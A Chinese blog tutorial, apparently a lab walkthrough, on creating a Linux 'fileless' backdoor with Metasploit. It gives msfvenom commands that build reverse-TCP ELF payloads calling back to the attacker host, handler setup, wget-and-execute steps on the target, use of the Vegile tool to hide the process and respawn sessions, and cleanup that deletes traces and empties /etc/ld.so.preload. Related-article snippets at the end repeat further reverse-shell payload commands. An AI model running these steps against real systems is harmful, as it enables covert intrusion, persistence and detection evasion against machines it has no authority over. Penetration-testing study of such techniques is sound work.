MSF-msfvenom Linux 无文件木马程序

最新推荐文章于 2024-03-13 14:11:24 发布
最新推荐文章于 2024-03-13 14:11:24 发布
阅读量1.1k 收藏 8
点赞数 1
分类专栏: 网络安全工具 文章标签: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fengzilin1973/article/details/115970005
版权

Linux 无文件木马程序

环境准备

文章目录

  • Kali Linux 2020.4
  • CentOS 7.6

IP地址

  • Kali Linux :192.168.37.139
  • CentOS :192.168.37.133

一、生成恶意文件

生成恶意文件让目标系统执行来获取 shell

┌──(root💀fengzilin54)-[~]
└─# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.37.139 LPORT=8080 -b "\x00" -f elf -o /var/www/html/fengzilin-backdoor

image-20210226190648604

在生成一个隐藏执行的后门

┌──(root💀fengzilin54)-[~]
└─# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.37.139 LPORT=4444 -b "\x00"  -f elf -o /var/www/html/fengzilin-ghost

image-20210226191442473

二、启动Apache服务

┌──(root💀fengzilin54)-[~]
└─# systemctl start apache2.service 
                                                                                                                                       
┌──(root💀fengzilin54)-[~]
└─# systemctl enable apache2.service 
                                                                                                           
┌──(root💀fengzilin54)-[~]
└─#  systemctl is-enabled apache2

image-20210226191719411

三、Vegile 使用

Vegile 官方下载链接 https://github.com/Screetsec/Vegile.git

Vegile 常用方法:

./Vegile --i  隐藏你的后门
./vegile --u  无限复制你的 metasploit 会话,即使被他 kill ,依然可以再次运行

使用注意事项

木马一定要放在Vegile 目录下

Vegile 一般用于维持 meterpreter 会话;

┌──(root💀fengzilin54)-[~]
└─# cd /var/www/html 
                                                                                                               
┌──(root💀fengzilin54)-[/var/www/html]
└─# rz

image-20210227093736496

四、获取Linux 系统的shell

MSF 配置监听

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp 
msf6 exploit(multi/handler) > set LHOST 192.168.37.139
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > run -j     //在后台运行 handler ,发现在冰没有session,因为客户端还有没有执行

image-20210227094249292

image-20210227094425582

回到 CentOS 操作系统下载执行文件来建立session,为了模拟实战效果隐藏行为通过该session进行操作

先下载工具

[root@localhost ~]# wget 192.168.37.139/fengzilin-backdoor 
[root@localhost ~]# chmod +x fengzilin-backdoor 
[root@localhost ~]# ./fengzilin-backdoor

image-20210227094738119

使用 sessionID 连接 CentOS

msf6 exploit(multi/handler) > sessions -i 1
参数: -i <opt>  Interact with the supplied session ID

image-20210227094928655

查看网络连接状态

netstat -antup | grep 8080

image-20210227095152656

可以看到我们的PID是 8390

ps -aux | grep 8390

image-20210227095314395

查看IP地址

找不到命令怎么办

image-20210227095424557

使用绝对路径就可以找到

image-20210227095553171

五、创建无文件后门程序

配置监听 4444端口

新建终端窗口,MSF 控制台多个启动互不影响

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp 
msf6 exploit(multi/handler) > set LHOST 192.168.37.139
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run -j

image-20210227095933035

我们回到前面建立的session 中下载用于隐藏进程的工具

wget 192.168.37.139/Vegile-master.zip

image-20210227100139675

解压

注如:无unzip 命令 可使用 yum install -y unzip 安装即可

unzip Vegile-master.zip

image-20210227100531991

//切换目录
cd Vegile-master
//添加执行权限
chmod +x Vegile

image-20210227101105921

//下载用于隐藏执行的后门程序
wget 192.168.37.139/fengzilin-ghost
//添加执行权限
chmod +x fengzilin-ghost
//隐藏后门程序执行
./Vegile --i fengzilin-ghost

image-20210227100935179

image-20210227100856094

按任意键退出 Vegile ,不是session

我们回到另一个 MSF 控制台查看session

msf6 exploit(multi/handler) > sessions -i 1

image-20210227101511284

目标端口为 36760

我们查看一下我们注入到了 那个进程

/usr/sbin/lsof -i:36760

image-20210227101709041

同样是一个 sh 进程

我们删除我们下载的所有文件

rm -rf /root/Vegile-master

错误提示

ERROR: ld.so: object '/usr/local/lib/libprocesshider.so' from /etc/ld.so.preload cannot be preloaded: ignored.

解决办法

echo "" >/etc/ld.so.preload   //64位系统没有这个文件导致报错

image-20210227101916498

注:删除时,也会把 xuegod-ghost 这个后门程序删除了。虽然文件被删除了,但会话,还是建立着了。删除我们所有文件之后程序依旧正常执行。

其他命令

./Vegile --u 无限复制你的 metasploit 会话,即使他被 kill,依然可以再次运行
./Vegile --i fengzilin-ghos t
丰梓林
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
06-24
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
Msfvenom-命令-总结大全--
爱我非你莫属的博客
10-05 1541
Msfvenom命令 -p (–payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) -l 查看所有payload encoder nops。 -f (–help-formats) 输出文件格式。 (- -hel
Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹
Liu_Bruce的博客
05-09 3508
Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹 ​ 长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也在一直致力于研究避开检测的方法(简称为免杀技术)。远程控制被控端也可被看作病毒的一种。 ​ 到目前为止,杀毒软件主要使用了3种技术。如下: 基于文件扫描的反病毒技术。这种技术主要依靠对程序的二进制代码进行检测,反病毒工程师将病毒样本中的一段特有的二进制代码串提取出来作为特征码,并将其加入病毒库,检测程序时看它是否包含这个特征码。 基于
【网络安全】 MSF生成木马教程
最新发布
一直被模仿,从未被超越
03-13 908
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
Linux文件木马程序渗透测试复现
永远是少年
06-15 1066
今天继续给大家介绍渗透测试相关知识,本文主要内容是Linux文件木马程序渗透测试复现。 一、实战介绍 二、初次渗透测试 三、无文件木马渗透测试
Powershell 配合msf无文件攻击
洋洋的小黑屋
04-27 1630
生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1121 -f psh-reflection >x.ps1 放到VPS上,这里我们放到本机搭建的apache环境中 kali设置监听,并且启动 win7中访问木马是否成功 直接在win7的cmd中执行命令 powersh...
msf-Msfvenonm生成Linux后门木马实验
渗透、攻防、CTF、编程
10-12 9519
msf-meterpreter生成Linux后门木马实验 0x01 知识点 MSF工具的利用,msf生成Linux木马后门 0x02 实验环境: 攻击机kaili linux 2020 (ip:192.168.233.131) 攻击机kaili linux 2020 (ip:192.168.233.129) 0x03 实验过程 1、生成Linux后门 131机器打开kali msfconsole 输入 msfvenom -p linux/x64/meterpreter/reve..
Msfvenom的简单用法
热门推荐
Shanfenglan's blog
11-04 7万+
CATALOG1.常见高级参数2.常用生成载荷命令2.1 生成linux系统反向shell载荷2.2 生成windows系统载荷2.3 生成web类型载荷2.4 生成语言类载荷 1.常见高级参数 参数字段 效果 set PrependMigrate true 启用迁移进程(默认为:false) set PrependMigrateProc explorer.exe 迁移到此进程名:explorer.exe set SessionExpirationTimeout 0 会话超时时间0秒
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使...
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_
09-30
ros RTK驱动,可用于ROS开发,需要建立ROS工作空间
php-msf-demo
04-29
下载项目git clone https://github.com/pinguo/php-msf-demo.git# Step2. 安装docker镜像构建开发环境.进入项目目录sh build.sh# Step3. 参考Step2输出的信息,使用ssh或者exec进入容器, 到达项目根目录, 安装依赖...
php-msf-docs:PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual
04-29
PHP-MSF开发手册 PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual,PHP微服务框架即,是Camera360社区服务器端团队基于Swoole自主研发的现代化PHP服务框架,简称msf或者php-msf,它的核心...
【转】msfvenom使用指南
weixin_34146805的博客
10-22 441
msfvenom命令行选项如下: Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括...
Msfvenom的使用
Beret-81的博客
03-12 972
目录1、初识 Msfvenom2、Msfvenom 使用3、Msfvenom 例子Msfvenom 生成 elf 文件4、Msfvenom 生成各种 Payload 1、初识 Msfvenom Msfvenom是Metasploit独立的有效载荷生成器,也可以替代msfpayload和msfencode。 2、Msfvenom 使用 语法: Msfvenom -p lhost= lpor...
Kali实现msfvenom在Windows和Linux靶机下后门漏洞
weixin_43287317的博客
03-28 5987
Kali实现msfvenom在Windows和Linux靶机下后门漏洞
msfvenom 使用
prettyX的博客
04-12 282
参考: https://blog.csdn.net/caiqiiqi/article/details/70768972 https://blog.csdn.net/whatday/article/details/82904623 比如,我们要生成一个在Linux平台下使用的elf,可以使用如下命令: msfvenom -p linux/x86/meterpreter_reverse...
msfvenom的简单使用
jeff_true的博客
01-14 615
1,msfvenom -l | grep windows | grep x64 | grep tcp 2,msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.19.91.10 LPORT=4444 -f exe > shell.exe 将此exe文件传到目标靶机上(windows x64) 3,msfconsole use exploit/...
msfvenom 基本使用
blackguest07的博客
03-05 1363
msfvenom 基础命令
msf生成linux木马
03-16
要生成Linux木马,可以使用MSF中的payload生成器来创建一个适合Linux系统的payload,然后使用MSF中的exploit模块来利用漏洞,将payload注入到目标系统中,从而实现远程控制。具体操作可以参考MSF的官方文档或相关...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值